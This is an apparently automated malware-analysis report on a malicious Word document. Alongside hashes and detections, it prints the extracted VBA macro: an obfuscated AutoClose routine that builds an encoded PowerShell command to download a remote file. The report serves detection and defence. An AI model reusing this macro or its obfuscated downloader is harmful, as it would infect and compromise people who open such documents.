Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4d252b9933fc2afe…

MALICIOUS

Office (OLE)

114.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: e25a6d89ddb27364cbaa706609019f67 SHA-1: f0a6492fcb8a08c9e47b9ff6b99b3ae403dd1506 SHA-256: 4d252b9933fc2afe4222ef7ac830c414ac7e4e9a37601a70bb96fbaa512aeb78
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoClose macro and a Shell() call indicate an attempt to execute arbitrary code. The ClamAV detection name 'Doc.Malware.Pwshell-6700199-0' suggests a PowerShell-based payload, though no specific PowerShell commands were directly extracted. The macro's obfuscated nature and the lack of clear URLs or commands prevent a higher confidence score.

Heuristics 6

  • ClamAV: Doc.Malware.Pwshell-6700199-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Pwshell-6700199-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 83614 bytes
SHA-256: 75d57b021e859414f981606a82427a7c9febe924cd875166fbbce57c04d12cd5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const FaMOcitAnaHyRBAKoiyByisAqazoNuWYTEl = 0
Sub AutoClose()
On Error Resume Next
Dim daViMoLAPOfufILuBYxERIz(3)

daViMoLAPOfufILuBYxERIz(0) = Right(NqYSERAcixeTijuGY, 4024)
daViMoLAPOfufILuBYxERIz(1) = Sqr(3)
daViMoLAPOfufILuBYxERIz(2) = Left(NqYSERAcixeTijuGY, 4024)
Dim muwApSikOlUQIiaPOioKOmewONeveiuCUlUj(3)

Dim lIQEmiGUGosigDehojELOSInIxeja(3)

lIQEmiGUGosigDehojELOSInIxeja(0) = Right(salIPigAgoqURIbARIc, 3316)
lIQEmiGUGosigDehojELOSInIxeja(1) = Sqr(8)
lIQEmiGUGosigDehojELOSInIxeja(2) = Left(salIPigAgoqURIbARIc, 3316)
Dim KAnyaYaysIJquGakomyzCEymovEHocnepIwibos(3)

KAnyaYaysIJquGakomyzCEymovEHocnepIwibos(0) = Right(aeHpaSEBPQ, 6460)
KAnyaYaysIJquGakomyzCEymovEHocnepIwibos(1) = Sqr(2)
KAnyaYaysIJquGakomyzCEymovEHocnepIwibos(2) = Left(aeHpaSEBPQ, 6460)
muwApSikOlUQIiaPOioKOmewONeveiuCUlUj(0) = Right(cezoAQiTYcIiOw, 9295)
muwApSikOlUQIiaPOioKOmewONeveiuCUlUj(1) = Sqr(2)
muwApSikOlUQIiaPOioKOmewONeveiuCUlUj(2) = Left(cezoAQiTYcIiOw, 9295)
Dim lIcYnUbavUiEspwINYziCabuRulyvGUiU(3)
Dim hEkUGoSUTeFIcnITjjUHiaEPiqUr(3)

hEkUGoSUTeFIcnITjjUHiaEPiqUr(0) = Right(peLoLUxugekAgoZuxYGUxedI, 2202)
hEkUGoSUTeFIcnITjjUHiaEPiqUr(1) = Sqr(9)
hEkUGoSUTeFIcnITjjUHiaEPiqUr(2) = Left(peLoLUxugekAgoZuxYGUxedI, 2202)

Dim PEsAPiwitIdisYsEjUHELaZIBuqUmvatY(3)

PEsAPiwitIdisYsEjUHELaZIBuqUmvatY(0) = Right(iEdiCAkiQUDiiy, 1371)
PEsAPiwitIdisYsEjUHELaZIBuqUmvatY(1) = Sqr(10)
PEsAPiwitIdisYsEjUHELaZIBuqUmvatY(2) = Left(iEdiCAkiQUDiiy, 1371)
Dim pAJEjAQDURyqEPEsogYVYHITOTEVejaSiQUlE(3)

pAJEjAQDURyqEPEsogYVYHITOTEVejaSiQUlE(0) = Right(JEjIgZELaKUmoDuREdY, 1598)
pAJEjAQDURyqEPEsogYVYHITOTEVejaSiQUlE(1) = Sqr(1)
pAJEjAQDURyqEPEsogYVYHITOTEVejaSiQUlE(2) = Left(JEjIgZELaKUmoDuREdY, 1598)
lIcYnUbavUiEspwINYziCabuRulyvGUiU(0) = Right(cUFuhArElOgOLErOsabiVAk, 8961)
lIcYnUbavUiEspwINYziCabuRulyvGUiU(1) = Sqr(2)
Dim FelOtOPozumuCUZoTeRHuqiLUDuFYxUMYN(3)

FelOtOPozumuCUZoTeRHuqiLUDuFYxUMYN(0) = Right(siBeDaFisoSAfOveK, 6891)
FelOtOPozumuCUZoTeRHuqiLUDuFYxUMYN(1) = Sqr(3)
FelOtOPozumuCUZoTeRHuqiLUDuFYxUMYN(2) = Left(siBeDaFisoSAfOveK, 6891)
Dim DutylUwWAxucakmYhigoPenyjeaiP(3)

DutylUwWAxucakmYhigoPenyjeaiP(0) = Right(foGeMyBUWunO, 8525)
DutylUwWAxucakmYhigoPenyjeaiP(1) = Sqr(1)
DutylUwWAxucakmYhigoPenyjeaiP(2) = Left(foGeMyBUWunO, 8525)
lIcYnUbavUiEspwINYziCabuRulyvGUiU(2) = Left(cUFuhArElOgOLErOsabiVAk, 8961)
Dim FEJYkafiNyZAZARYbAXahyhaAjEvybuHUJALef(3)

FEJYkafiNyZAZARYbAXahyhaAjEvybuHUJALef(0) = Right(NORiJIrIVApIlUV, 1662)
FEJYkafiNyZAZARYbAXahyhaAjEvybuHUJALef(1) = Sqr(10)
FEJYkafiNyZAZARYbAXahyhaAjEvybuHUJALef(2) = Left(NORiJIrIVApIlUV, 1662)
Dim xoBIhInYCydiwiQAtuUCaByxoFAgeJurECE(3)

xoBIhInYCydiwiQAtuUCaByxoFAgeJurECE(0) = Right(iipUaucOLIMaMeoKAqABiV, 8095)
xoBIhInYCydiwiQAtuUCaByxoFAgeJurECE(1) = Sqr(3)
xoBIhInYCydiwiQAtuUCaByxoFAgeJurECE(2) = Left(iipUaucOLIMaMeoKAqABiV, 8095)
LIxDwIBaCaiUdUwibomEBaiOnAaygjYyZSaTAt = "d.exe /" + Format(Chr(70 + 9 + 1 + 5 + 4 + 6 + 4)) + " p^O^w^e^R^s^H^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^" + Format(Chr(70 + 9 + 1 + 5 + 4 + 6 + 4)) + "^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^" + Format(Chr(70 + 9 + 1 + 5 + 4 + 6 + 4)) + "^A^A^6^A^C^8^A^L^w^B^s^A^G^U^A^b^w^B^w^A^G^E^A^Z^A"

Dim ZCOtaGGyfnOBORObaNOmOGAwoMIDYDOi(3)

ZCOtaGGyfnOBORObaNOmOGAwoMIDYDOi(0) = Right(ideMOWeTYNYsoiezeZIl, 7164)
ZCOtaGGyfnOBORObaNOmOGAwoMIDYDOi(1) = Sqr(7)
ZCOtaGGyfnOBORObaNOmOGAwoMIDYDOi(2) = Left(ideMOWeTYNYsoiezeZIl, 7164)

Dim GaQeDIRIrODAwUbAMorIzxAaIVyKuVIKOTID(3)

GaQeDIRIrODAwUbAMorIzxAaIVyKuVIKOTID(0) = Right(wuwIDyQACASENIxojzUrYf, 1148)
GaQeDIRIrODAwUbAMorIzxAaIV
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.